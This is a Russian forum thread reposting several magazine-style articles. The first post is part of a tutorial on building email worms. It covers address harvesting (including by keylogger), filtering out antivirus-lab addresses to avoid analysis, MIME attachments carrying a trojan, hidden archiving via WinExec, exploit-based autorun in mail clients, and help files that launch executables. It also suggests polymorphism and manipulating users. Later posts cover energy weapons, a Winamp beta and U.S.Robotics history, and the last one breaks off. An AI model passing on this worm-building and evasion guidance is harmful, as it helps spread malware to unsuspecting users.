Следующим этапом после адресных книг будет поиск мыл в файлах на диске. Сделать это очень просто, поэтому приводить примеров я не буду, но подскажу, что для реализации этого тебе хватит API-функций FindFirstFile, FindNextFile, FindClose, CreateFile, ReadFile и CloseHandle, ну и еще обязательно понадобится немного мозгов (они пригодятся для того, чтобы сообразить, как использовать регулярные выражения для поиска мыл - прим. gorl'а). Конечно, помимо этого, можно извлекать адреса из адресных книг других программ, можно даже использовать кейлогер и отслеживать вводимые юзером данные, все эти приемы повышают эффективность червя и увеличивают скорость его размножения. Очень важный момент при получении списка адресов - это его фильтрация. Ты ведь не хочешь, чтобы твой червь сам отправился прямиком в лабораторию Касперского, поэтому следует сделать список слов-исключений, которые не должны встречаться в адресах, пригодных для рассылки. Все адреса с этими словами просто следует не включать в базу.

[cоздание аттачей в письме]

В статье про управление трояном я рассматривал простейшую отправку письма и процесс SMTP-чата, но не рассматривал процесс отправки аттачей в тексте письма. Начнем с того, что аттачи передаются не в бинарном виде, а в текстовом. Связано это с тем, что изначально SMTP/POP3 протоколы предназначались исключительно для передачи текста и работали не с байтами, а с 7-битными символами, что позволяло передавать только знаки латинского алфавита. Все символы, не попадающие в этот диапазон, обрезаются почтовым сервером до 7 бит, что вынуждает нас перед передачей кодировать бинарные данные в специальный формат. В свое время было придумано множество вариантов кодирования (UUE, XXE, Base64), но прижился и с успехом используется сейчас только формат Base64. Давай кратко рассмотрим принципы кодирования Base64.

Как известно, байт состоит из восьми битов. Один байт может принимать 256 значений: от 0 до 255. Однако если вместо восьми байт использовать только шесть, то объем вложенной информации уменьшается до 64 значений: от 0 до 63. Теперь главное: любую цифру 6-ти битового байта можно представить в виде печатного символа. 64 символа это не так много, ASCII-символов вполне хватит, что позволяет закодировать все данные в следующий набор:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

А далее берутся три последовательных байта по восемь бит (всего 24 бита) и побитно делятся на четыре 6-ти битных байта (всего 24 бита).

Немного странно звучит, «шестибитный байт». На самом деле бит восемь, однако используются только 6 младших бит, два старших бита игнорируются. Основываясь на этом принципе, мы можем закодировать любую двоичную информацию в текст, не очень сильно увеличивая ее объем (на 30%). Затем наша информация через почтовый сервер попадет к нужному адресату, почтовик которого декодирует текст в двоичный файл.

Готовый пример Base64-кодирования ты найдешь на диске с журналом. Но просто вставить Base64-код в текст письма недостаточно. Для того чтобы почтовая программа распознала этот текст как аттач, нужно сформировать соответствующие заголовки. В начало письма обязательно нужно вставить заголовки MIME-Version и Content-Type, первый определяет версию MIME (мы будем использовать 1.0), а второй - тип содержимого письма и разделители между MIME-элементами. Перед самими Base64-данными должен быть вставлен блок, описывающий тип этих данных, имя файла в аттаче и тип его кодирования. Выглядеть это будет примерно так:


MIME-Version: 1.0

Content-Type: multipart/mixed; boundary="_===13023223====_"

--_===13023223====_

Content-Type: text/plain; charset="windows-1251"; format="flowed"

Content-Transfer-Encoding: 8bit

[Текст письма]

--_===13023223====_

Content-Type: application/octet-stream

Content-Disposition: attachment;

filename="trojan.exe"

Content-Transfer-Encoding: base64

[Здесь идут Base64 данные]

С тем, как добавить файл в аттач, я думаю, все понятно.

Так как все пересылаемые файлы мы будем паковать в архив, то давай разберемся, как можно его создать. Самым простым и лучшим способом будет использование внешнего архиватора, например, если на компе юзера установлен WinRar, то архив создается всего одной строкой: WinExec('rar.exe a -r data.rar trojan.exe', SW_HIDE). Подобным образом можно использовать и другие архиваторы, но, к сожалению, не у всех на компе стоит хоть какой-нибудь архиватор. В таком случае нам ничего не остается, кроме как создавать архивы вручную. Но так как париться со сжатием, я думаю, тебе не хочется, то будем использовать библиотеку MadZip, которая позволяет полноценно работать с ZIP-архивами, и при этом добавляет в исполнимый файл всего 20 Кб веса. Библиотека как всегда на диске с журналом, с ней очень легко разобраться, честное слово.

Итак, суть работы червей и некоторые моменты их реализации я постарался здес описать. Приведенной здесь информации, конечно, недостаточно для того, чтобы вызвать новую эпидемию, но все что для этого нужно ты можешь легко изучить сам (но не в коем случае не делай этого - это плохо!). Для начала советую найти в сети исходники Beagle и MyDoom и внимательно их изучить, затем прочесть и понять RFC на SMTP и MIME-протоколы. Нужно разбираться в психологии для того, чтобы заставить большое количество юзеров запустить аттач. И весьма неплохо было бы добавить к червяку какой-нибудь полиморф. Но я все равно надеюсь, что новой эпидемии не будет, так как каждый, кто разберется в этой теме до конца, не станет тратить свои знания на бесполезное уничтожение, а лучше использует их для написания общественно полезного софта. Верно? wink.gif

[автозапуск аттача]

Недостаток большинства мыльных червей в том, что для их запуска нужны действия пользователя. Но этого можно избежать, если использовать уязвимости в почтовом ПО. Наиболее популярный в народе почтовый клиент - Outlook Express при просмотре html-писем использует движок Internet Explorer. Всем известно, что этот движок отличается исключительной дырявостью. На IE было выпущено множество эксплойтов, запускающих код на уязвимой машине, и большинство их можно использовать для автозапуска червя при открытии письма! За такую замечательную возможность нам нужно поблагодарить Билла Гейтса, а разработчикам IE нужно памятник при жизни поставить за то, что они сделали в нем много удобных для использования дыр smile.gif.

Очень странно, что эту возможность использует очень мало червей. Как пример можно привести червя Winevar. Червяк этот очень старый (еще 2002 года), но отличается от большинства других червей тем, что использует дырку iFrame и запускается при просмотре письма в окне быстрого просмотра Outlook. Это, конечно, круто, но есть возможность лучше. Наверное, ты слышал о существовании jpeg-эксплойта. Существование этого эксплойта связано с ошибкой в обработке jpeg-файлов в системной библиотеке, что позволяет заразить комп через любую программу, показывающую jpeg-картинки! Это можно использовать не только в Outlook, но и в других почтовых клиентах, таких как TheBat или Eudora. На диске ты найдешь исходник этого эксплойта, но, к сожалению, в настоящее время он срабатывает мало у кого.

Эксплойты - это, конечно, хорошо, но, к сожалению, не всегда можно найти что-то реально рабочее, поэтому стоит присмотреться к другим методам маскировки червя в письме. Если в письма слать exe-файл, то мало кто его запустит, так как юзеры стали осторожнее. Но большинство из них даже не подозревает, что опасность может скрываться в .hlp- и .chm-файлах. Одна из малоизвестных возможностей help-файлов - выполение сценариев на простом скриптовом языке, причем эти сценарии позволяют запускать исполнимые файлы. Эту возможность можно использовать с высокой эффективностью, так как доверия к hlp-файлам намного больше, чем к exe. Help-файлы можно создавать в Help Workshop (входит в состав MS Visual Studio 6). Инфу по скриптовому языку можно прочитать в документации к этой программе. В качестве демонстрации этого метода на диске лежит help-файл, запускающий cmd.exe. Но не составит никакого труда сделать хэлп, который форматирует винт wink.gif.




--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 12 2006, 17:39
Сообщение #84


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Из лазера по банкамВооружение века хай-тек

Стараниями писателей-фантастов и голливудских киношников роль вооружения будущего прочно закрепилась за энергетическим оружием. Это те самые бластеры, лазеры, лучеметы и прочие штуковины, стреляющие мощными потоками частиц, разрядами, электромагнитными излучениями и другими бестелесными субстанциями. Их главным преимуществом перед пулями и снарядами является мгновенное поражение цели. Идея квантового скачка в новую эру вооружений давно занимает умы военных. В сегодняшнем обзоре читай о самом интересном футуристическом оружии и перспективах модернизации классики.

Последние десятилетия кипит работа над прототипами разнообразного энергетического оружия, проводятся его испытания. Законы физики ставят перед современными технологиями такие барьеры, преодоление которых требует нереальных экономических затрат. Пушки стоимостью более 100 миллиардов долларов за штуку не по карману даже Пентагону. Больше всего денег вбухано в космические системы. Однако об их реальном боевом применении говорить пока рано. Ближе всех к практической реализации оказались мощные наземные и корабельные установки средней дальности. Но и они пока воспринимаются как очень и очень дорогие игрушки. Идеи индивидуального энергетического оружия на деле являются далекими и фантастическими.

Лазер с лазерным прицелом

Области применения лазеров необозримы. Куда ни сунься - кругом лазеры. Они используются в медицине, связи, электронике и голографии. Хотя физическая суть у всех лазеров общая, принципы работы, как и возможности, различаются. Военные ценят способность лазеров концентрировать огромную энергию в очень узком луче. Это реально высокоточное оружие. На дальности 10 километров можно получить пятнышко диаметром всего 1 сантиметр. При этом твердотельный лазер мощностью всего 10 киловатт способен создавать луч с плотностью энергии в миллионы раз большей, чем на поверхности Солнца. Промышленные лазеры уже сегодня, как масло, режут стальные и титановые листы. Почему же карманный гиперболоид инженера Гарина до сих пор остается несбыточной мечтой?

В первую очередь, нужна энергия для накачки лазера. Чтобы получить пару десятков киловатт при КПД 20%, придется таскать с собой дизель-генератор весом несколько тонн. Остальные 80% будут расходоваться на тепло, которое необходимо отводить, иначе агрегат просто расплавится вместе со стрелком. Вентиляторами и водичкой тут не обойтись. Кроме того, сами фокусирующие устройства должны иметь приличные размеры для наименьшего расхождения луча на больших дальностях. Установкам необходим еще и точный прицел, желательно лазерный. Шмалять наугад основным лучом – дело бесперспективное.

Футурологи уверенно предсказывают изобретение компактных источников большой энергии. Действительно, в недрах атомных ядер и в химических реакциях скрыта колоссальная энергия, которую нужно лишь аккуратно высвободить. Но пока это удается сделать только в сопровождении взрыва. Правда, есть атомные электростанции, но они еще очень далеки от компактности. Сегодня о боевых лазерах можно говорить лишь как о стационарных вариантах для средств, способных нести многотонные силовые установки, – кораблей, самолетов, космических платформ.

Первые серьезные испытания мощных лазеров класса «земля - воздух» проводились Пентагоном в начале 80-х годов. На полигоне Уайт Сэндс в Нью-Мексико была наглядно продемонстрирована возможность поражать баллистические ракеты. Химический лазер MIRACL мощностью 2 мегаватта с расстояния 1 км дырявил неподвижно закрепленную вторую ступень ракеты Titan-1, раскрашенную под советскую с соответствующей маркировкой. Чтобы сильнее бабахнуло, «Титана» накачали сжатым газом. За 12 секунд «Чудо» так нагрело ракету, что, по словам руководителя программы СОИ, «лазер разнес эту штуковину буквально на куски».

За 20 лет американцы доросли до первого тактического лазера, приспособленного для реального боевого применения. Совместно с израильтянами они совершенствуют мобильную систему MTHEL (проект «Наутилус»). Установка неоднократно была опробована в деле. Она успешно сбивает реактивные снаряды «Хезболла». Близки к завершению и разработки твердотельных лазеров для поражения наземных и воздушных целей. Эти аппараты можно будет перевозить на джипе. Разрабатываются самолетные лазеры большой мощности.

Советский Союз экспериментировал с боевыми лазерами с 70-х годов. В подмосковном Троицке был создан газовый лазер мощностью 1 мегаватт. Установка, аналогичная MIRACL, была построена в Таджикистане. Существовали и другие проекты. В 1987 году ракетой-носителем «Энергия» на орбиту была выведена 80-тонная боевая лазерная станция «Скиф-ДМ» («Полюс»). Но с замораживанием гонки вооружений эксперименты по стрельбе в космосе были отменены. К великой радости американцев, у которых до сих пор нет средств доставки на орбиту таких гигантских конструкций. «Скиф-ДМ» затопили в Тихом океане.

Спутники-шахиды

Космические лазеры, поражающие баллистические ракеты противника за тысячи километров, теоретически будут еще больше в размерах. Так, химические лазеры для накачки требуют тонны топлива, охлаждающего вещества и компонентов самого рабочего тела, которое расходуется при каждом выстреле. Фокусирующие зеркала должны быть большими и весьма тяжелыми. Самыми мощными из таких лазеров являются так называемые газодинамические. По сути, это реактивные двигатели, где молекулы фтористого водорода ускоряются до сверхзвуковых скоростей. Такой выхлоп нарушает привычные представления о том, что у лазеров не бывает отдачи. В открытом космосе один выстрел унесет всю платформу вместе с лазером в очень далекое путешествие. Для компенсации реактивного импульса понадобятся дополнительные двигатели и много топлива.

Между прочим, проблема отдачи была решена советскими инженерами еще в 70-х годах. Каким образом – военная тайна ;-). Конструкторы ухитрились установить на пилотируемую станцию «Алмаз» 30-миллиметровую авиационную пушку Нудельмана для отстрела вражеских звездолетов при сближении. Космонавты даже успешно из нее постреляли, сохраняя орбиту и точную ориентацию станции.

Для звездных войн Пентагон готовит рентгеновские лазеры с ядерной накачкой. Они достаточно мощные, но намного компактнее химических. У этих лазеров только один «маленький» недостаток – одноразовость. Мощный импульс излучения рентгеновских лазеров формируется в момент взрыва небольшого термоядерного заряда. Мировое сообщество всеми силами препятствует выводу на орбиту любых ядерных установок. Поэтому запускать такие платформы Пентагон рассчитывает непосредственно при начале ракетной атаки противника. Существует вариант «ронять» спутники на цели с последующим термоядерным взрывом.

Хирургия глаза

Вспоминаю свое первое знакомство с лазером, когда еще не было ни сидиромов, ни эксимеров и лазерные указки не продавались в каждом ларьке. На лабораторном занятии я подносил стеклянную призму в красивый рубиновый луч лазера и отклонял его в открытое окно соседнего здания. За что был наказан преподавателем-подполковником, так как вполне мог засветить кому-нибудь в глазик. Мощности тех лазеров хватало лишь на пробивание дырок в копировальной бумаге для последующих замеров штангенциркулем (проверяли расходимость луча). Однако ожог сетчатки при «удачном» попадании был почти гарантирован.

Вряд ли у тебя получится сконструировать самодельный лучемет, разобрав старый сидюк или даже резак, который на раз прожигает болванки. Чтобы полупроводниковый лазер мощностью около 30 милливатт повредил глаз, нужно обеспечить прямое попадание в зрачок. А для этого придется пялиться непосредственно в выходное отверстие лазера. Прицельное наведение в глаза выполнить непросто. Инфракрасный луч невидим, хотя очень опасен. Светить лазером в дверные глазки бесполезно, так как пластиковая оптика для этого диапазона непрозрачна. В случае с приличной оптикой, например, в приборах ночного видения снайперов, в танках и самолетах, ослепить можно по полной программе.

Женевская конвенция запрещает создание и использование ослепляющего оружия, считая его зверским. США ратифицировали соответствующий протокол в 1999 году, и, по идее, должны были снять с вооружения подствольный лазер Sabre 203, прикрепляемый к винтовке M-16. Эта штука пускала красные зайчики с гарантией ослепления на дальности до 300 метров. Запрет имеет оговорки. Так, если в самолет ударил луч боевого лазера с намерением просверлить в нем дырку, но попал при этом в глаз летчику, никаких нарушений усмотрено не будет. Лазейку активно используют. В 2001 году российские ученые создали более мощный и универсальный аналог Sabre 203, позиционируя его как инструмент борьбы с террористами. Кроме подствольного, он существует в самостоятельном варианте с телескопической оптической системой.

Все пучком

Современные лазеры являются наиболее проработанным видом энергетического оружия. Остальные находятся на стадии идей, теоретических изысканий и экспериментов. Следует выделить пучковое оружие. Его поражающая сила заключена в высокоэнергетических элементарных частицах - электронах, протонах и нейтронах, разгоняемых с помощью линейных ускорителей - синхрофазотронов. Разрушительная мощь таких потоков может быть очень велика, значительно больше, чем у световых квантов. Механизм воздействия отличается от лазерного. В то время как лазер сначала должен пробить поверхность (оболочку) объекта, элементарные частицы проникают вглубь вещества и нарушают работу цели изнутри.

Поток частиц со скоростями, близкими к световой, мгновенно уничтожает цель на расстоянии нескольких километров. Однако эксперименты показали, что частицы неслабо нагревают воздух. Воздух ионизируется, и электрические силы закручивают пучок, который при этом может свернуться в кольцо. Все равно что стрелять из автомата в ванной комнате. Чтобы этого не произошло, можно, например, пробить для пучка канал к цели при помощи мощного лазера.

Синхрофазотрон – вещь серьезная. Помимо наземных вариантов, разместить такую дуру весом в десятки тонн можно разве что на авианосце. Военные моряки намерены использовать боевые ускорители частиц для поражения противокорабельных крылатых ракет.

Плазменные клизмы

Плазма, она же ионизированный газ, – четвертое агрегатное состояние вещества, самое распространенное во Вселенной. Агрегаты, способные вырабатывать высокотемпературную плазму, вполне можно использовать как оружие. Это будет похоже на очень мощный огнемет (фактически огонь – это тоже плазма). Получается плазма довольно легко - при электрических разрядах, при горении и взрывах, других высокотемпературных воздействиях на вещество.

Интересно, что плазма образуется при функционировании многих давно известных видов оружия. Кумулятивная граната при взрыве формирует мощную струю высокотемпературной плазмы, которая мгновенно делает в толстой броне танка дыру. В рекламных целях такое оружие стали называть плазменным. Взять, к примеру, пресловутые плазменные панели, к которым больше подходит термин «газоразрядные». Скорее, это просто дань хай-теку. Скоро лампы дневного света будет принято называть плазменным освещением, а примус – плазменным нагревателем.

Из новейших средств можно отметить безгильзовую электротепловую химическую пушку. Стреляет она обычными или специальными боеприпасами. По сути, это древняя пушка с запалом. Высоковольтный разряд превращает зажигательную смесь в плазму и выталкивает заряд с огромной скоростью.

Полицейский бесконтактный электрошокер StunStrike компании Xtreme Alternative Defense Systems, в отличие от классических тазеров, не требует дротиков-электродов с проводами. В сторону жертвы выстреливается узкий пучок специальной аэрозоли. Аэрозоль ионизируется, образуя пространственный проводник для высоковольтного разряда. Дальность действия составляет 15 метров.

Среди глобальных идей можно назвать буржуинский проект по формированию многокилометровых ионизированных облаков-плазмоидов в верхних слоях атмосферы. Предполагается, что они будут парализовывать радиосвязь, работу электроники и даже воздействовать на здоровье людей. Аналогичный проект разрабатывается в НИИ Радиоприборостроения под руководством академика Авраменко. Цель наших плазмоидов – создание препятствий на пути ракет и других летящих объектов.

Сказочные звуки

Шумовое оружие американцы планировали применить в Ираке. Звуковая пушка Long Range Acoustic Device (LRAD) поражает противника направленным лучом пронзительного визга с уровнем до 130 децибел и частотой от 2 до 3 кГц. Это слегка превышает уровень болевого порога и сравнимо с реактивным двигателем над ухом или концертом Iron Maiden ;-). Ранее подобные установки использовались на военных кораблях для распугивания рыболовецких шхун.

Не утихают споры и вокруг инфразвукового оружия. Колебания воздуха на частотах в диапазоне 3-10 Гц, как известно, могут входить в резонанс с внутренними органами человека, вызывать их вибрацию и повреждения. При этом люди и животные ощущают чувство немотивированного страха и паники. Говорят, где-то в секретных бункерах пытались подобрать частоты для нейтрализации половых органов человека. Такой вариант тоже может в каком-то смысле деморализовать личный состав неприятеля. В любом случае, аэродинамические агрегаты для создания мощного инфразвука будут иметь большие размеры. Воздействие невозможно локализовать в одном направлении. Затыкать уши здесь бесполезно. Поражены будут все, включая оператора установки.

Пушки на магнитах

Немецкий журнал Soldat und Technik недавно поведал о таинственном происшествии в Ираке. Знаменитый американский танк «Абрамс» был прошит насквозь. В обеих стенках башни из суперпрочной антикумулятивной брони образовалось аккуратное отверстие диаметром всего 7 миллиметров! Такое не под силу ни одному оружию на Земле, за исключением... Вывод был таков – либо это инопланетяне, либо так называемая электромагнитная, или рельсовая, пушка. Глава специальной комиссии ЦРУ Чарльз Дефлер подтвердил, что найдены секретные документы, касающиеся проекта создания railgun в Ираке.

Разработка такой пушки велась в США, СССР и других странах с 70-х годов. Установка весит до 100 тонн и имеет длину до 100 метров. Суть механизма проста. По двум направляющим рельсам подается мощный импульс тока. Между рельсами движется тележка-снаряд, которая разгоняется под действием силы Лоренца. Фактически, это линейный электродвигатель постоянного тока. Конструкция должна быть очень точно просчитана, иначе снаряд, не успев разогнаться, испарится под действием огромного наведенного тока.

Технология позволяет разгонять снаряды до гиперзвуковых скоростей. На испытаниях в США были получены скорости более 4 км/с. В перспективе электромагнитные пушки смогут обеспечить метание самонаводящихся снарядов массой около 3 кг на дальность до 5000 км со скоростью 35 км/с. При этом длина пушки составит 45 м. Обычные пороховые заряды на такое не способны даже теоретически. Замечательным свойством рельсовых пушек является высокая скорострельность и способность стрелять очень легкими снарядами. Railgun может на огромном расстоянии «плеваться» кусочками плазмы весом менее одного грамма.

Народной разновидностью электромагнитных пушек являются ружья Гаусса. Они гораздо ближе к квейковской рельсе по габаритам. Принцип действия немного другой. На стволе устанавливается несколько электромагнитных катушек с питанием от предварительно заряженных конденсаторов. Они втягивают снаряд, например гвоздь, последовательно включаясь и отключаясь по мере его прохождения по стволу. Такие ружья могут пробивать бутылки и фанеру. Описаний конструкций в интернете множество, в том числе на сайте ][ (www1.xakep.ru/post/13054/default.asp). Очень симпатичные пистолеты Гаусса делает Евгений Васильев из Пскова (www.pskovinfo.ru/coilgun).

Заключение

Побочным продуктом пентагоновских научных изысканий оказалась такая полезная штуковина, как интернет. Я надеюсь, что параллельные мирные открытия, включая мощные источники халявной энергии, похоронят у человечества всякое желание воевать. Беда в том, что вояки будущего растут на сегодняшних компьютерных шутерах. Когда все эти палсганы, шок-райфлы, флэки и прочие бластеры и лазеры станут реальностью, под знамена армии будущего встанут геймеры. Миллионы воинов с великолепными навыками владения новым вооружением и знанием тактики ведения боя в различных условиях. Однажды мир на Земле будет в твоих руках. Дай мне слово: если стрелять, то только по банкам. Из лазера.

«- Я марсианин! - сказал он глуховатым голосом. - Всем оставаться на местах, иначе пущу в ход аннигилирующий бластер с фамагустой».

Георгий Шах. «О, марсиане!»

«...Кучера в асбестовых латах и царевы доезжачие с мотопомпой набросились на обезумевших чудовищ, нанося им удары прикладами лазеров и мазеров».

Станислав Лем. «Кибериада. Путешествие второе».

INFO

Рекомендую книгу Шмыгина А.И. «СОИ глазами русского полковника», 2000 г. Текст можно найти в интернете.

DANGER

Если инопланетяне вдруг презентуют тебе мощный ручной лазер, не стреляй там, где накурено или много пыли. Сгоришь.




--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 14 2006, 11:04
Сообщение #85


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Новости аудиоманьяков

Мы ждали этого события, и вот, наконец, свершилось! 10 октября нынешнего года вышла новая версия любимого многими проигрывателя - старого доброго ВинАмпа. Естественно, мы не могли оставить без внимания такое событие - и вот тебе наши первые впечатления от третьей бета-версии сего продукта.

Новая версия?

Знакомство с пресс-релизом компании убедило, что цифра "три" в номере версии поставлена не случайно. Мол, написан он на принципиально новой "платформе кодирования" (движок, по-нашему). И это дает необычайную гибкость и легкость как для пользователей в настройке продукта, так и для сторонних разработчиков - теперь любой компонент может быть добавлен, выкинут или настроен по желанию. "Почти абсолютная свобода в создании приложений". Т.е. теперь можно не только скины менять, а вообще все переделать. И второе новшество - очень тесная интеграция с компанией Gracenote и ее сервисом CDDBТ, что даст слушателям возможность идентифицировать любую песню (исполнителя, название песни, альбома и жанр) - неважно, с родного ли CD песня или же с купленного на Митинском рынке сборника мптришек. Заманчиво, не так ли? Пришло, пришло время покопаться во внутренностях! Дистрибутив берем с www.winamp.com, его размер оказывается на 400 кило меньше, чем у последней официальной версии. По ходу дела трижды соглашаемся с тем, что это есть бета-версия для разработчиков, и никто не обещает нам работоспособности компа после ее запуска. Наконец, инсталлируем и запускаем.

Про качество звука ничего писать не буду - как был, так и остался на весьма приличном уровне. Единственное принципиальное изменение в звучании - вновь включена поддержка "Crossfade". Это когда текущая песня в списке потихонечку затухает и одновременно с эти постепенно начинается следующая - удобно для диджеев, наверное. В глаза же сразу бросается возможность изменять размеры программы - как ты помнишь, предыдущие версии позволяли максимум двукратное увеличение. И владельцы больших мониторов испытывали неудобства, особенно по утрам, пытаясь попасть в маленькие кнопочки "Play" или "Stop". Эта проблема теперь решена. Еще новшество эстетического характера - теперь по отдельности настраивается цвет каждого элемента (т.е. фон, кнопочки и иконки). Больше того - каждой песне на твоем диске можно присвоить определенные цветовые настройки (правда, у меня эта фича так и не заработала - бета-версия все-таки).

Новости и старости

Эквалайзер практически не изменился - ну, на то он и эквалайзер. Из кардинально нового в программе - появилась поддержка нескольких плэйлистов одновременно, и это реально круто. Я, например, сразу загрузил в один лист все песни с винта, после чего начал раскидывать их по темам - песни для романтического вечера, песни для бурной вечеринки и так далее. Управился намного быстрее, чем в прошлой версии. Но появился и еще один способ работы с твоими мптришками - то, что называется "Media Library". Библиотека, если можно так выразиться. При первом запуске предлагает просканировать твой винт на наличие песен, после чего радостно выдает тебе на гора список найденных.

Радует сортировка - по артисту, по альбому, по жанру, по году и даже по примечаниям. Эта штука серьезно облегчает поиск нужной мптришки - но только в том случае, если у тебя правильно прописаны все тэги. Иначе один и тот же артист будет обзываться несколькими разными именами, и толку от этого прибамбаса будет чуть. Еще полезная штука все в той же библиотеке - нажатие правой кнопки крысы на песне вызывает предложение внести ее в конец того плэйлиста, который сейчас считается активным. При нажатии той же кнопки на песне в плэйлисте тебе предложат поместить ее после ныне играющей. И там, и там есть еще вариант "редактировать свойства файла", но везде эта строка серая - недоступна, мол, пока. Бета-версия опять же...

Еще в программу теперь встроен свой мини-браузер. Его предназначение мне понять так и не удалось - при запуске появилась страница винампа, где мне было предложено скачать скрины, плагины или послушать инет-радио. Любой же выбор вызывал к жизни окошко ослика ИЕ, и дальнейшие события происходили уже в нем. Так что этот браузер - для любителей "всего в одном", реально он мало облегчает пользование. Кроме того, ни один из скачанных мной скинов, а также взятая на пробу игрушка (плагин) не встали в эту бету - заработали они только в предыдущей версии.

Пиратим, не выходя из...

Плагин, о котором стоит сказать отдельно. Конечно, то, что разговор о нем идет сегодня, - это просто совпадение. Он по времени вышел примерно одновременно с третьей бетой и ею еще не поддерживается (хотя прекрасно встал в версию 2.76). Это штучка, которая позволяет искать музыку в сети KaZaA (подробнее об этой сети и ее преимуществах я писал в 10 номере Х). Запускаешь Винамп, заходишь в сеть, открываешь плагин, вводишь слово для поиска (артист, название песни) и... обламываешься. Потому как сохранить найденную песню на диск нельзя (по крайней мере официально ;-)), а слушать ее прямо в режиме трансляции невозможно. Невозможно, если к сети тебе приходится подключаться, - ну а если ты сидишь на T3 или хотя бы на T1, то очень даже с удовольствием послушаешь.

Не только для домохозяек

Интернет-радио не то что бы очень поразило, но в целом понравилось. Список каналов дает инфу о названии станции, скорости вещания и играемой в данный момент песни. Удалось найти аж две станции любимого стиля, из них одну (с битрейтом вещания в 24) даже можно было нормально слушать - без перерывов и пауз для подгрузки контента. В списке присутствовали и наши радиостанции - типа "Европы минус" и "Радио шам-себе-сон". Любимые каналы можно загонять в плэйлист и, подключившись к сети, в дальнейшем слушать прямо их - не загружая вновь полного списка.

Еще в этой версии есть понятие скрипта. Не имеет никакого отношения ни к перлу, ни к cgi. Что же это есть - удалось понять только на прилагаемом примере. Включение его вызвало уже довольно поднадоевшую лупу, которая начала бегать за курсором и увеличивать кусок изображения под ним.

Есть и визуализация - а как же без нее. Несколько стандартных режимов, разворачивающихся на весь экран и демонстрирующих все богатство твоей видюхи и монитора. Помимо этого, есть так называемая "Студия Визуализации", в которой творится форменный кавардак - можно создавать свои варианты видео беспредела, который будет сопровождать проигрывание твоих любимых песен. Кроме того, можно скачать и уже написанные другими цветовые гаммы. Если ты, как и я, включаешь проигрывание музыки и начинаешь на компе работать, то тебе вряд ли особо пригодятся все эти режимы - тут либо картинки смотри, либо делом занимайся. Одно из трех, и пятого не дано, сам понимаешь...

И последняя прикольная фича - появился так называемый "Thinger". Это небольшое окошечко с кнопками, вызывающими к жизни любой из нужных тебе компонентов ВинАмпа - хоть основное окно, хоть нет-радио, хоть настройки эквалайзера. Привыкнув к нему, получаешь реальное удобство в работе.

Подводя итог

В общем, скажу так - бета осталась жить на моей машине. Очень понравились новые возможности работы с мптришками, разбросанными по всем винтам. К основным же недостаткам стоит отнести невозможность проигрывания компактов (да, мне так и не удалось заставить прогу играть мои диски) и... общее впечатление сырости, что ли. Там - невозможно переключить активное окно - зацепится курсор за основное (тогда все движения мышой приводят только к его судорожным подергиваниям вверх и вниз по экрану), и для перехода в плэйлист надо свернуть все окна, а затем развернуть - тогда, может, и получится. Здесь - стоит добавить радио в плэйлист - и все находившиеся там до этого песни загадочным образом пропадают из списка. Понятно, что эти недостатки наверняка будут устранены к выходу официальной версии, каковая обещается в первой половине будущего года. А так - рекомендуется для скачивания либо фанатам именно ВинАмпа, либо же тем, кого, кроме удобства работы с файлами, ничего и не интересует. Так что думай сам, решай сам, а если какие вопросы - пиши, не стесняйся.





--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 14 2006, 12:07
Сообщение #86


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



USR - это наше все Исторический обзор продукции U.S.Robotics



Как появилась компания U.S.Robotics

Начало семидесятых годов - эра бурного роста микропроцессорных технологий и становления основных направлений компьютерного бизнеса. За несколько лет полупроводниковая промышленность выросла практически из ничего в громадную индустрию с оборотом в миллиарды долларов. Многие известные сегодня компании создавались талантливыми инженерами и предпринимателями именно в то время. К 1977 году, когда стоимость процессоров в очередной раз снизилась вдвое, о потенциальных возможностях персональных ЭВМ начали задумываться во многих компаниях. MITS (Micro Instrumentation Telemetry Systems) разработала микрокомпьютер "Альтаир" на базе процессора Intel 8080 с оперативной памятью 1Kb и языком программирования Basic, написанным Биллом Гейтсом и Полом Алленом из Micro-Soft (так выглядело первое название этой организации). Компьютер стоил около 400$ и потому был доступен многим. Вскоре появился ПК Apple и многие другие. При широком распространении персональных компьютеров возрастала необходимость в устройствах связи, способных передавать данные на большие расстояния.

